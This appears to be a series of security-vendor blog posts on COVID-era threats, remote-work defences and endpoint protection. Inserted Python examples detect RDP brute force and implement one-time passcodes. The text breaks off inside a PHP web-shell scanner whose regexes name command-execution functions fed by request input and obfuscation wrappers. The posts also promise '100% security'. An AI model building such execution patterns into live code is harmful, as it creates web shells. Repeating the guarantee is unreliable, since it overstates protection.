Forecasting Cyber Threats After The COVID-19 Pandemic

As the news changes on an almost daily basis, it’s difficult to know what to expect after the pandemic. Here is a review of the existing threats and how your company can prepare for the world during and after the pandemic. 

It is no secret that the COVID-19 pandemic is an unprecedented health and economic crisis, affecting the wellbeing of employees. This pandemic has affected many businesses and business operations globally, but one area that may have been overlooked by many is cybersecurity.

As a result of the coronavirus outbreak, cybercrimes have skyrocketed. Scammers are now launching fraudulent campaigns that cash in and feed off the cybersecurity gaps occasioned by emergencies and the necessity to adopt new working models.

In this post, we take a look at the existing cyber threats, what to expect after the pandemic, and how your company can prepare for the inevitable. Let’s dig in:

Cybersecurity Risks in the COVID-19 Context

Some of the leading cybercrimes emanating from the COVID-19 crisis include:

Phishing attacks using the COVID-19 disease as bait

Fraudsters have been sending malicious emails impersonating government agencies and departments in charge of dispensing government-funded COVID-19 support initiatives. Such emails are usually designed to direct the recipient to a fake website where they are deceived to enter their personal and financial information.

Malware distribution using the pandemic as bait

Hackers have been leveraging human traits such as curiosity and concern around the coronavirus outbreak to deploy malware. In most cases, they send emails (with subject lines containing COVID-19-related phrases such as “Coronavirus Update”) that persuade the victim to download a malicious file from a website.

To create an impression of authenticity, the fraudsters spoof sender information in an email to make it look like it came from a trustworthy source, such as the World Health Organization (WHO).

Supply chain and remote working threats

As the pandemic spreads, governments have invoked several containment measures, such as social distancing and self- or government-imposed quarantines, forcing companies to shift to remote working.

Fraudsters have taken advantage of this massive move to launch more attacks by exploiting various vulnerabilities in remote working tools. Since the recently deployed remote workers have had less training regarding the required security protections due to the current implementation rush, they are more prone to attacks.

Cybersecurity Risk Post-COVID-19

The COVID-19 outbreak is accelerating the trend towards telework, and we may see a more permanent shift towards telecommuting. As such, enterprises will continue facing the following challenges:

  • Telework will open multiple vectors for cyberattacks on employees due to increased use of personal devices and dependency on home and public networks.
  • Critical business assets will be at risk of exposure to targeted and opportunistic cyberattacks by fraudsters and other malicious organizations seeking to exploit vulnerabilities and plant the seeds of possible future attacks.
  • Critical public sector services such as healthcare will continue to be under pressure and will be hit hard with new types of ransomware, often aimed at disrupting connectivity, as well as denial-of-service attacks.
  • Ransomware targeting supply chains and online services will also be on the rise. Weakened organizations will be more vulnerable.

This begs the question: how will companies prepare for the inevitable?

A Robust Cybersecurity Response after COVID-19

Organizations will need to execute robust cybersecurity measures to prevent further crises. Beyond COVID-19, these seven areas will require attention.

#1. Teleworking solutions

Since we anticipate a permanent increase in telework, organizations should consider:

  • Procuring sufficient on-demand bandwidth to facilitate communication and content sharing, especially video conferencing across geographically dispersed sites.
  • Managing identity and access for remote staff to meet corporate security requirements as well as employees’ ease-of-use needs.
  • Deploying secure connectivity solutions to staff workstations, such as IPsec (Internet Protocol Security) based VPN clients.

#2. External perimeter protection

Remote connections will undoubtedly increase an enterprise’s cyber-attack surface. Businesses may protect their external perimeters by:

  • Locking down staff workstations as well as company-based laptops with advanced security settings. This includes managing configurations centrally, and not giving administrative privileges to end-users.
  • Deploying network access control (NAC) as a solution that will help authenticate and validate devices, as well as enforce security policies before allowing them to connect to company networks.
  • Deploying solutions that enable remote endpoint data collection and analysis to help identify unauthorized activity.

#3. Cloud services

Cloud services offer many benefits over on-premises data storage and application hosting. Besides monitoring cloud usage within the enterprise, these services can enforce related cybersecurity policies and guard against malware. To enjoy these benefits, cloud services need to be strategically adopted and managed. Companies should consider:

  • Adopting formal strategies for the use of cloud services.
  • Defining data storage regulations outlining the requisites for the use of cloud services, data center storage, and local storage, especially for crucial information.

#4. Secure collaboration tools

Video conferencing, email and office productivity tools have been very useful during the pandemic. Companies may choose to:

  • Adopt and use additional secure collaboration tools
  • Explore emerging technologies like virtual reality and chatbots for content delivery

#5. Cybersecurity policy

Organizations should consider conducting a risk assessment and establishing enforcement mechanisms such as:

  • Single sign-on
  • Automatic logout from unattended devices
  • Multi-factor authentication

#6. Supply chain and third-party management

The pandemic may make it necessary for your supply chain associates to change their business model. Organizations should consider:

  • Reviewing third-party agreements (for instance, with IT providers) to ascertain that they meet the latest requirements and have acceptable liability provisions.
  • Conducting regular cybersecurity audits for all third parties with authorized access to the company network, data, or systems.

#7. Cyber-attack financial protection and recovery

Companies should consider cyber insurance, which can come in handy as a cost-effective financial backstop should they experience a cyber-attack. Enterprises need to:

  • Review their current insurance coverage to identify potential gaps
  • Examine how emerging cybersecurity challenges may fit into the enterprise’s cyber risk transfer strategy
  • Examine possible changes in coverage terms and conditions at renewal. As insurers assess post-pandemic losses, they may see changes in claim patterns.

Consider MDR

In the midst of the pandemic, this monitored service for endpoints has become a priority for many organizations. Antivirus on endpoints is not enough to protect your corporate data. The fact is that cyberattacks on endpoints are increasing rapidly in complexity and numbers. MDR includes the ability to stop threats before they are able to do any harm. Plus with a team of security analysts watching your systems 24/7, we’ll help you remediate any issues that may occur. 

Learn more about MDR from Cybriant here. 

Final thoughts

The pandemic has brought a new era in cybersecurity, and IT experts who raise their game in protecting their companies during this crisis period will be crucial to the re-opening of the economy. Enterprise managers need to keep an eye on the medium and long term, recognizing that telecommuting may become the norm for a majority of the workforce long after the pandemic has ended.

While educating the remote workforce about cybersecurity best practices is a great move, it’s not enough. The cornerstone for success lies in deploying technologies that are effective and quick to adopt.

At Cybriant, we help brands like yours implement strategies that will rapidly increase your breadth and depth of security protection.

6 Enterprise Security Tips for Remote Workers

The COVID-19 pandemic ushered in a rapid change to the way in which many people work. Here are 6 ways to ensure enterprise IT security. 

White-collar workers have mostly shifted to working remotely from their own homes. Some enterprises facilitated remote work arrangements before the pandemic, but this mode of working is now the norm.

The rapid shift to remote work brings many new security challenges to enterprise IT departments. The perimeter of the corporate network extends to the devices people use at home to connect to the network and do their work.

6 Steps to Ensure Enterprise IT Security

Here are six tips to make sure that your organization’s IT security defenses remain strong regardless of where your employees work from.

#1. Protect All Endpoints

Having the majority of your workforce working remotely leads to a large increase in the number of endpoint devices on your network. Whether your business opts to give employees company-certified laptops or you allow workers to connect to the network from their own devices, it’s imperative to protect these endpoints.

One option for endpoint protection is to use dedicated enterprise endpoint protection software and have it installed on every endpoint device. Another option is to mandate that employees have up-to-date anti-virus software installed on their personal devices before they can connect to the corporate network.

This can be overwhelming for IT departments, which is why we have created a service called Managed Detection and Remediation (MDR). MDR from Cybriant will help reduce the time between breach and detection, and we can also help stop the threat before it can fully execute. Learn more here: cybriant.com/mdr.

#2. Properly Secure RDP Ports

It’s common for businesses to use remote desktop connections to give employees remote access to the same desktop workstation they would normally use on-premises. Remote workers can access remote desktops using the proprietary Remote Desktop Protocol (RDP). Cybercriminals frequently look for open RDP ports in an attempt to gain brute-force access to remote desktops inside corporate networks.

To properly secure RDP ports, make sure that employees use strong passwords of at least 12 characters to connect to remote desktops. Another important step is to enable automatic updates so that any vulnerabilities in the remote access software are fixed as soon as patches become available.

Organizations may consider VPN as an option. Here is a helpful guide on how to be safe using VPN. 
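The brute-force activity described above leaves a clear trace in the Windows Security log: repeated Event ID 4625 (failed logon) records with logon type 10 (RemoteInteractive, the type RDP sessions use) from one source address. The detector below is an added example, not code from the original post or from Cybriant; it assumes the events have already been exported as dicts carrying the standard 4625 field names, and the sample records are constructed for the example.

```python
"""Flag RDP brute-force attempts in exported Windows Security log events.

Added example (not from the original post). Assumes events are available
as dicts with the standard 4625 field names (TimeCreated, EventID,
LogonType, IpAddress, TargetUserName). Logon type 10 is RemoteInteractive,
the type recorded for RDP sessions, so repeated type-10 failures from one
source address within a short window are the signal of interest.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_LOGON = 4625        # Event ID: "An account failed to log on"
REMOTE_INTERACTIVE = 10    # Logon type used by RDP sessions

# Constructed sample records (TEST-NET addresses): one source hammering
# several accounts, one legitimate user who mistyped a password once.
SAMPLE_EVENTS = [
    {"TimeCreated": "2020-05-04T08:00:01", "EventID": 4625, "LogonType": 10,
     "IpAddress": "203.0.113.45", "TargetUserName": "administrator"},
    {"TimeCreated": "2020-05-04T08:00:05", "EventID": 4625, "LogonType": 10,
     "IpAddress": "203.0.113.45", "TargetUserName": "admin"},
    {"TimeCreated": "2020-05-04T08:00:09", "EventID": 4625, "LogonType": 3,
     "IpAddress": "203.0.113.45", "TargetUserName": "admin"},   # network logon, not RDP
    {"TimeCreated": "2020-05-04T08:00:12", "EventID": 4625, "LogonType": 10,
     "IpAddress": "198.51.100.7", "TargetUserName": "jsmith"},  # single typo, benign
    {"TimeCreated": "2020-05-04T08:00:14", "EventID": 4625, "LogonType": 10,
     "IpAddress": "203.0.113.45", "TargetUserName": "backup"},
    {"TimeCreated": "2020-05-04T08:00:20", "EventID": 4624, "LogonType": 10,
     "IpAddress": "198.51.100.7", "TargetUserName": "jsmith"},  # successful logon, ignored
    {"TimeCreated": "2020-05-04T08:00:22", "EventID": 4625, "LogonType": 10,
     "IpAddress": "203.0.113.45", "TargetUserName": "sqlsvc"},
    {"TimeCreated": "2020-05-04T08:00:30", "EventID": 4625, "LogonType": 10,
     "IpAddress": "203.0.113.45", "TargetUserName": "test"},
    {"TimeCreated": "2020-05-04T08:00:41", "EventID": 4625, "LogonType": 10,
     "IpAddress": "203.0.113.45", "TargetUserName": "administrator"},
]


def detect_rdp_bruteforce(events, threshold=5, window_seconds=60):
    """Return {source_ip: finding} for every source address that produced at
    least `threshold` failed RDP logons inside any `window_seconds` span.

    A sliding window per source address keeps only the failures that are
    still inside the window, so a slow trickle of typos never accumulates
    into a false alert while a rapid burst is caught as soon as it crosses
    the threshold.
    """
    recent = defaultdict(deque)   # ip -> deque of (timestamp, username)
    findings = {}
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] != FAILED_LOGON or ev["LogonType"] != REMOTE_INTERACTIVE:
            continue
        ts = datetime.fromisoformat(ev["TimeCreated"])
        ip = ev["IpAddress"]
        window = recent[ip]
        window.append((ts, ev["TargetUserName"]))
        cutoff = ts - timedelta(seconds=window_seconds)
        while window and window[0][0] < cutoff:
            window.popleft()          # drop failures that fell out of the window
        if len(window) >= threshold:
            findings[ip] = {
                "attempts": len(window),
                "users": sorted({user for _, user in window}),   # spread = password spraying
                "first_seen": window[0][0].isoformat(),
                "last_seen": ts.isoformat(),
            }
    return findings


if __name__ == "__main__":
    for ip, finding in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(f"{ip}: {finding['attempts']} failed RDP logons "
              f"({finding['first_seen']} .. {finding['last_seen']}), "
              f"accounts tried: {', '.join(finding['users'])}")
```

A finding with many distinct usernames from one address is the spraying pattern the post warns about; the usual response is to block the source at the perimeter and confirm that NLA and the 12-character password policy are enforced.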

#3. Use Multi-Factor Authentication

Multi-factor authentication adds an additional layer of protection to your IT security environment on top of a strong password policy. With multi-factor authentication, employees can only gain access to systems if they give two or more pieces of identification while signing in. The most practical use of multi-factor authentication is to require a standard username and password combination in addition to a dynamic one-time passcode that only remains valid for one login session.

We consider this a basic of enterprise security. Download our Remote Workers Guide to receive all the remote working tips from Cybriant’s CTO. 
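The dynamic one-time passcode described above is usually a TOTP (RFC 6238) built on HOTP (RFC 4226): an HMAC over a counter derived from the current time, truncated to six digits. The block below is an added example, not code from the original post or from Cybriant; it implements the two standard algorithms and a server-side verifier that honours the "valid for one login session" property by refusing to accept the same code twice, even inside its 30-second window. The secret and the username `alice` are constructed for the example.

```python
"""HOTP/TOTP one-time passcodes with single-use verification.

Added example (not from the original post). hotp() and totp() follow
RFC 4226 and RFC 6238 (HMAC-SHA1, dynamic truncation, 30-second step).
OtpVerifier is the server-side check: it allows a small clock skew but
records the highest counter already accepted per user, so a code can be
used for exactly one login even though it stays "valid" for its step.
"""
import base64
import hashlib
import hmac
import secrets
import struct
import time


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1(secret, counter) -> dynamic truncation -> digits."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                          # low nibble picks the 4-byte slice
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, for_time: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter = floor(unix_time / step)."""
    return hotp(secret, int(for_time) // step, digits)


class OtpVerifier:
    """Verifies TOTP codes and accepts each code at most once per user."""

    def __init__(self, secret: bytes, step: int = 30, digits: int = 6, skew: int = 1):
        self.secret = secret
        self.step = step
        self.digits = digits
        self.skew = skew                 # steps of clock drift tolerated each side
        self._last_counter = {}          # username -> highest counter already used

    def verify(self, username: str, code: str, now: float = None) -> bool:
        now = time.time() if now is None else now
        current = int(now) // self.step
        for counter in range(current - self.skew, current + self.skew + 1):
            if counter <= self._last_counter.get(username, -1):
                continue                 # already consumed: blocks replay of a captured code
            expected = hotp(self.secret, counter, self.digits)
            if hmac.compare_digest(expected, code):   # constant-time comparison
                self._last_counter[username] = counter
                return True
        return False


def provisioning_secret() -> tuple:
    """Generate a fresh 160-bit secret and its base32 form for an authenticator app."""
    raw = secrets.token_bytes(20)
    return raw, base64.b32encode(raw).decode("ascii")


if __name__ == "__main__":
    raw, b32 = provisioning_secret()
    print("base32 secret to enrol in the authenticator app:", b32)
    verifier = OtpVerifier(raw)
    code = totp(raw, time.time())
    print("code", code, "first use:", verifier.verify("alice", code))
    print("code", code, "replayed:", verifier.verify("alice", code))   # False
```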

#4. Inform Employees of Security Risks

IT departments commonly regard employees as weak links in the context of evaluating enterprise IT risks. Remote work exposes employees to more IT security threats than usual, and it’s harder for enterprises to mitigate these threats.

A good way to protect employees against security threats while remote working is to promote awareness of the threats they face. Consider distributing an internal memo that identifies the main threats criminals use to gain access to networks, such as phishing and social engineering. You could also ask employees to repeat any IT security awareness training modules that your company offers.

While awareness is important, we prefer to go back to #1: ensure the protection of endpoints. If you have a team of security experts watching your endpoints 24/7, you have the ability to protect your corporate data no matter what. Learn more about MDR here: cybriant.com/mdr.

#5. Secure Your Video Conferences

It’s important for businesses to maintain face-to-face communication and hold team meetings while people work from home. Video conferencing tools are popular choices for remote work, but this type of software can come with IT security risks.

It’s crucial to make an effort to secure all video conferences held by different teams and departments in your organization. Require passwords to gain access to video calls, and make sure your chosen tool has an alert feature that lets you know when someone new joins the conversation. You should also apply updates to your video conferencing software as soon as they are released.

#6. Protect Your Digital Assets

Your enterprise probably has many assets stored digitally on its network, including marketing materials, website content, illustrations, business plans, and presentations. A significant attack vector for hackers to gain access to valuable digital data is by stealing the credentials of an employee who has privileged access to more assets than they need for their daily work.

A vital measure to protect your digital assets is to enforce least privilege controls on all user accounts. The principle of least privilege minimizes user access permissions to only the assets they need to perform their daily work.

These decisions are easier made when you have a security framework in place, like NIST-CSF. Learn more about the importance of people, process, and technology here. 

Closing Thoughts

The flexibility to work remotely some of the time was becoming an important part of what white-collar workers expected from enterprises. The COVID-19 pandemic rapidly altered the dynamics of remote work such that it is now the status quo. By following IT security best practices and tips for remote workers, you can ensure your corporate network and valuable assets remain protected in a new threat landscape.

Many organizations prefer a simple, all-in-one solution to help promote their cybersecurity goals. We have created the perfect solution in our integrated service, PREtect.

Learn more here: cybriant.com/pretect.
Could an Endpoint Security Service Be Your Secret Cybersecurity Weapon?

Should you use an endpoint security service? The quick answer is yes, especially if your workers are accessing any corporate data on potentially unsecured endpoints. Read more about how this simple service could be your secret cybersecurity weapon. 

I was recently reading over the Forbes article, “Why Securing Endpoints Is The Future Of Cybersecurity” with some very interesting insights from Verizon’s 2020 Data Breach Investigations Report (DBIR). According to the article: 

Verizon’s DBIR reflects the stark reality that organized crime-funded cybercriminals are relentless in searching out unprotected endpoints and exploiting them for financial gain, which is why autonomous endpoints are a must-have today.

After reading the 2020 Verizon DBIR, it’s clear that if organizations had more autonomous endpoints, many of the most costly breaches could be averted. Autonomous endpoints that can enforce compliance, control, automatically regenerating, and patching cybersecurity software while providing control and visibility is the cornerstone of cybersecurity’s future.

For endpoint security to scale across every threat surface, the new hybrid remote workplace is creating an undeletable tether to every device as a must-have for achieving enterprise scale.
The lack of diligence around Asset Management is creating new threat surfaces as organizations often don’t know the current health, configurations, or locations of their systems and devices. Asset Management is a black hole in many organizations leading to partial at best efforts to protect every threat surface they have. What’s needed is more insightful data on the health of every device.

What is an Endpoint Security Service? 

When you outsource your endpoint security service, you have a team of security analysts that monitor your endpoints 24/7 and filter out false positives. You’ll receive alerts when relevant threats are detected, along with advice and insight from our cybersecurity team to help you mitigate and respond to the threat.

MDR or Managed Detection and Remediation is what we have named our endpoint security service. As an extension of your team, our experts will investigate, triage, and remediate security events and provide executive-level reporting. Remediation may reveal dormant or trojan threat actors that evade network and endpoint detection solutions. Our MDR solution includes leveraging the talents of our experienced team as well as next-generation antivirus and EDR tools that utilize AI.

The MDR service from Cybriant will allow you to protect your organization’s data and reduce your threat landscape against the most advanced threats. 

What is an endpoint? 

To put it simply, an endpoint is any device that communicates with the network in which it is connected. Here are some examples of endpoints: 

  • Laptops
  • Desktops
  • Mobile Phones
  • Tablets
  • Servers
  • Virtual Environments

What is the goal of endpoint security? 

According to Gartner, “Organizations investing in endpoint security tools are purposefully moving from an ‘incident response’ mentality to one of ‘continuous monitoring’ in search of incidents that they know are constantly occurring.”

Why do we need endpoint security?

Cybercriminals are leveraging advanced attack toolsets and techniques that can bypass most perimeter security solutions. The tools and techniques that cybercriminals use have outpaced the capabilities of many traditional endpoint security solutions as well. MDR is a cybersecurity technology that addresses the need for continuous monitoring and response to advanced threats.

What is the difference between endpoint security and antivirus?

Endpoint security differs from antivirus in that antivirus covers a single endpoint. Endpoint security covers your entire network and protects against security attacks.

Why outsource the monitoring of endpoint security? 

While endpoint security is a powerful tool that addresses the need for continuous monitoring and response to advanced threats, this tool is often difficult to deploy, manage, and monitor particularly at scale in large to mid-sized organizations.

With Managed Detection and Remediation (MDR), you have a team of endpoint security experts not only utilizing next-generation tools on your behalf, but also feeding information back to your organization on how to respond to alerts. Cybriant’s security team brings together endpoint analysts, incident responders, forensics experts, and security engineers. They understand what normal endpoint activity should look like, when a more thorough investigation is required, when to raise the alarm, and how to respond.

Best Endpoint Protection Tools of 2020

You already know that the traditional antivirus system is not enough to secure your network from cyber-attacks. Consider these endpoint protection tools for enterprise-level protection of your endpoints. 

Through our MDR service, Cybriant offers endpoint protection to secure all the endpoints connected to your IT network from cyber threats. Endpoints are the devices, such as smartphones, tablets, desktops, laptops, servers, or any other I/O device, connected to a network and acting as its terminal points.

Endpoints connected remotely with access to a network can create an opening for hackers to break into that network. Endpoint protection tools monitor and scan every device on the network. Endpoint protection makes sure that all your endpoints are secure and your network is free from malware threats by blocking suspicious and malicious endpoints from accessing your network.

Cybriant Managed Detection and Remediation (MDR) services allow you to monitor endpoints, install antivirus, and add firewall and enterprise perimeter protections to secure your endpoints and protect your business network from the rising wave of cybersecurity threats.

MDR vs. Antivirus: What is the Difference?

Both Managed Detection and Remediation (MDR) and antivirus are used to ensure the security of your endpoints. Before choosing one of them, you should understand in detail what each provides to protect your endpoints. Which is best, and why should you use one?

What is Antivirus?

Antivirus software is a traditional program used to detect and remove malware like viruses, keyloggers, trojans, worms, ransomware, adware, and many more.

Newly launched and upcoming malware is becoming more and more advanced. Hackers are designing malware so that it avoids detection by traditional antivirus. Antivirus software is available as a standalone solution or as one component of an endpoint protection platform.

Features of antivirus:

  • Web Protection
  • Alert notification
  • Real-time scanning option
  • Threat identification

Antivirus protects only individual devices and is suitable if you are running a small start-up.

What is Managed Detection and Remediation (MDR)?

MDR is an advanced and reliable service that combines technology and expertise to detect malicious activity on the networks of growing companies and organizations. Cybriant offers a managed detection and response (MDR) service to counter cyber attacks by reducing the time to detect them and suggesting useful remediation as soon as possible.

The cybersecurity research team of Cybriant monitors your network 24/7. To secure your business, we provide timely response to malicious activity and great remediation strategies to protect your valuable computer network data, including servers, mobile devices, and desktops from incursions and malware attacks. We assure you 100% security and defend your network against most advanced threats.

Importance Of Endpoint Security

As remote working increases rapidly, hackers have numerous opportunities to attack their victims and steal essential data through the loopholes that exist in the network. With the increase of endpoints like laptops, smartphones, tablets, and other mobile devices, the risk of losing data is also increasing day by day.

Hackers are always coming up with new ways to gain access to networks to steal valuable information or manipulate employees into giving out sensitive data. To address these risks and keep your organization’s sensitive data secure, it’s essential to protect any and all endpoints that are connected to your corporate networks.

Top Five (5) Enterprise Endpoint Protection Tools of 2020:

  • Bitdefender: If you want reliable security for your organization, then Bitdefender GravityZone Business Security should be on your shortlist. It offers extensive management controls along with strong detection capabilities.
  • SentinelOne: SentinelOne is an advanced, all-in-one endpoint security and AI platform from the company of the same name, presenting a combined antivirus and EDR solution. Cybriant also uses this endpoint protection tool, which offers real-time forensics to deliver investigative abilities and multiple detection methods.
  • ESET Endpoint Security: ESET endpoint protection is well suited to small and medium-sized businesses. It provides remote management so that a small business can grow without interruptions related to endpoint security.
  • Symantec Endpoint Protection: Symantec offers a fully featured endpoint protection solution with advanced threat prevention capabilities, including fileless attack protection, enhanced mobile application security, and protection for cloud-connected users. Symantec is recognized as a strong competitor among anti-malware solutions worldwide.
  • CrowdStrike Falcon: The CrowdStrike Falcon endpoint solution covers Windows workstations and servers as well as Macs, smartphones, and tablets, whether on or off the network, and combines EDR and anti-malware into a single agent. It also offers real-time visibility into detected malicious activity.

Why should you choose Cybriant for Endpoint protection?

As already mentioned above, we are using the most advanced SentinelOne technology tools to provide you with impeccable endpoint security with the help of AI Managed Detection and Response (MDR), EDR, and next-generation antivirus solutions.

Cybriant’s cybersecurity analyst team monitors you 24/7 and sends a prompt notification when a threat or anomalous activity attempts to breach your security. Our experienced team also provides response and remediation to deal with unknown threats.

MDR services help to meet the growing challenges of enterprise threats and protection. They allow you to secure your organization’s sensitive records and reduce the impact of unknown attacks.

How to Stop Hackers That Are Exploiting Coronavirus Panic

In a recent Hacker News story, it was revealed how hackers are exploiting the coronavirus panic. Here are some ways to help prevent those hacks from destroying your business.

Hacker News revealed 7 ways that hackers are exploiting our fears around the Coronavirus. Research is showing that attackers are using Coronavirus-specific lures to reach potential targets.

The attack surface is changing and expanding rapidly as many organizations and business tasks are going digital without much preparation, exposing themselves to more potential threats.

Most of the recent cyberattacks primarily exploit the fears around the COVID-19 outbreak, fueled by disinformation and fake news, to distribute malware via Google Play apps and malicious links and attachments, and to execute ransomware attacks.

The World Health Organization has seen its share of cyber scammers. See their warning here. We’ve reviewed several ways to defend your enterprise while working from home as well as released a remote worker’s guide.

Here are the 7 ways that hackers are exploiting the Coronavirus panic.

  1. Mobile Malware
  2. Email Phishing
  3. Discounted Off-the-Shelf Malware
  4. SMS Phishing
  5. Face Mask and Hand Sanitizer Scams
  6. Malicious Software
  7. Ransomware Attacks

The United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC) released a joint alert titled COVID-19 Exploited by Malicious Cyber Actors.

Advanced Persistent Threat (APT) groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and “hack-and-leak” operations.

Cybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.

Both APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. Threats observed include:

  • Phishing, using the subject of coronavirus or COVID-19 as a lure,
  • Malware distribution, using coronavirus- or COVID-19-themed lures,
  • Registration of new domain names containing wording related to coronavirus or COVID-19, and
  • Attacks against newly (and often rapidly) deployed remote access and teleworking infrastructure.

How Can You Protect Your Organization?

In our recently released Remote Workers Guide, our CTO Andrew Hamilton describes all the ways Cybriant is protecting our organization while we are working from home because of the COVID-19 outbreak in the US.

In this guide, we discuss tips to secure personal devices and the exact steps to take if you think you have been compromised. Our team deals with highly sensitive data and our remote workers must be vigilant when working remotely. Download the guide and see what steps we’ve taken to prevent our team from cyber attacks.

You’ll also be interested to learn the types of cyber attacks you may see while working from home. Download the guide today and let Cybriant assist your organization during this unique time in our lives.

Recommendations from Cybriant

We typically recommend starting with an assessment so our team has a better grasp of where you are in your security strategy. We offer all assessments including:

  • Risk Assessment
  • Gap Analysis
  • Penetration Test
  • Mobile Security Risk Assessments

Find out more about our assessments here.

Mobile Security Risk Assessment

Our comprehensive mobile security risk assessment will allow you to evaluate the risk presented to the organization by mobile phones and tablets, evaluate potential omissions in policies, documentation, and implementation. This assessment will also help evaluate the impact of mobile device policy on diverse geographic and economic user groups. Plus, we’ll be able to recommend actions to better secure and align mobile devices to business practices.

Our comprehensive mobile security risk assessment will include the following:

  • Evaluate risk presented to the organization by mobile phones and tablets
  • Evaluate potential omissions in policies, documentation, and implementation
  • Evaluate the impact of mobile device policy on diverse geographic and economic user groups
  • Recommend actions to better secure and align mobile devices to business practices

This is an incredibly important step to take while your enterprise is working from home. Learn more about our Mobile Security Risk Assessment here.

Managed Detection and Remediation (MDR)

Antivirus isn’t enough to protect your endpoints.

The fact is that cyberattacks on endpoints are increasing rapidly in complexity and numbers. With digitization continuing to transform industries, devices in huge numbers are likely to be compromised.

To mitigate the risk of compromised systems, you need an immediate response, enhanced security tools, and a team of experts on your side that can guide you through the entire remediation process.

With MDR from Cybriant, our security analysts monitor your endpoints 24/7 and filter out false positives. You’ll receive the alerts when relevant threats are detected along with advice and insight from our cyber security team to help you mitigate and respond to the threat.

Learn more about MDR from Cybriant.

Mobile Threat Defense

Corporate infrastructures have been venturing into the BYOD (Bring Your Own Device) world for years, often without knowing it. Conditional restrictions are often not in place to prevent access to corporate data stored in email, SharePoint, calendaring, corporate contacts, and other applications. And even where conditional restrictions do exist, mobile threat defense software may not be present or used on the device.

By contrast, companies will often stringently secure their corporate laptops and desktops with MDR solutions, SIEM agents, and vulnerability management solutions. The difference in approach between BYOD devices and corporate-managed devices is troubling, because BYOD devices can often access the same confidential data without similar safeguards. With the recent string of major vulnerabilities discovered in both the Android and Apple iOS ecosystems, it is becoming more apparent that any device that can access corporate data is a potential avenue for attack.

With two levels of service, Cybriant’s Mobile Threat Defense (MTD) service is an affordable way to protect the majority of your workforce, contractors, and BYOD users. It provides a baseline of protection and assurance that your mobile devices will be secured against common threats and attack vectors.

Learn more about our Mobile Threat Defense offerings

Defending Your Enterprise While Working from Home

With the proper tools and techniques in place, it’s possible to continue to defend your enterprise while your staff is working from home. Here are some good points to remember and share about securing mobile devices.

Now More Than Ever: Hackers Want Endpoints

Attackers understand the global pandemic we are currently experiencing. They also know that whatever you are NOT focused on defending is where they can flow like water to get in.

Where are you not focused as a defender? That’s where the hacker will go.

Since working remotely has been mandated to slow the spread of COVID-19, focus on your users’ endpoints.

According to the 2019 Verizon Data Breach Investigations Report, 94% of malware was delivered by email. Be aware that users are even more likely to click on malicious links when they are using their mobile devices.

Mobile Devices Users are More Vulnerable to Phishing Attacks

According to a recent mobile phishing report, the rate at which people fall for phishing attacks on mobile has increased by 85% year over year.

Mobile devices connect from outside the traditional firewall, typically lack endpoint security solutions, and use a plethora of messaging platforms that are not used on desktops. Additionally, the mobile user interface does not give the depth of detail needed to spot a phishing attempt, such as hovering over a hyperlink to reveal its real destination.

As a result, mobile users are three times more likely to fall for phishing scams, according to IBM.

Finally, the huge amount of personal and corporate data on mobile devices is making these devices the preferred target for phishing attacks.
In fact, in spite of being protected by traditional phishing protection and education, 56% of Lookout users received and tapped a phishing URL on their mobile device between 2011–2016. Fortunately, in these cases the attack was thwarted by Lookout.

Before enterprises can achieve comprehensive protection against phishing attacks across all vectors, including the mobile device, security and IT professionals need to understand how current phishing myths muddy the waters and get the facts that will help them make informed decisions on how to protect corporate data.

Source

Hackers’ Capabilities

It’s difficult for users to keep up with attackers’ capabilities. As a corporation, you could potentially have a team of security experts on hand who are able to research those capabilities and help you put a defense strategy in place. The tools below are among the publicly available tools attackers use to breach endpoints and move through networks once they have a foothold:

Remote Access Trojans (RAT)

A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. RATs are usually downloaded invisibly with a user-requested program — such as a game — or sent as an email attachment. Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a botnet. Source

Web Shells

A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.

A web shell can be written in any language that the target web server supports. The most commonly observed web shells are written in languages that are widely supported, such as PHP and ASP. Perl, Ruby, Python, and Unix shell scripts are also used. Source
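Because a web shell is just ordinary server-side script that hands request parameters to a code- or command-execution function, that combination is also what a defender can hunt for on a web server. The scanner below is an added example for this page, not Cybriant’s or any vendor’s tool: it scores PHP sources on how directly request input reaches an execution function and on the obfuscation wrappers (eval of base64_decode and similar) commonly used to hide that. The file names and PHP sources are constructed for the example; the patterns cover PHP only, although the same idea applies to the ASP, JSP and other shells the NCSC report describes.

```python
"""Score PHP files for web-shell indicators (added example, constructed input)."""
import re

EXEC_FUNCS = r"(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)"
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|FILES)\b"
OBFUSCATORS = r"(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)"

# (rule name, compiled regex, weight). Weights are an assumption; tune to your estate.
RULES = [
    # request parameter flows straight into an execution function: the classic shell
    ("exec_from_request",
     re.compile(r"\b" + EXEC_FUNCS + r"\s*\([^;]*" + REQUEST_INPUT, re.I), 5),
    # $f($_GET['x']) style: function name chosen at runtime, argument from the request
    ("variable_function_on_request",
     re.compile(r"\$\w+\s*\(\s*" + REQUEST_INPUT, re.I), 4),
    # eval(base64_decode(...)) and friends: payload hidden behind a decoder
    ("eval_of_obfuscated_payload",
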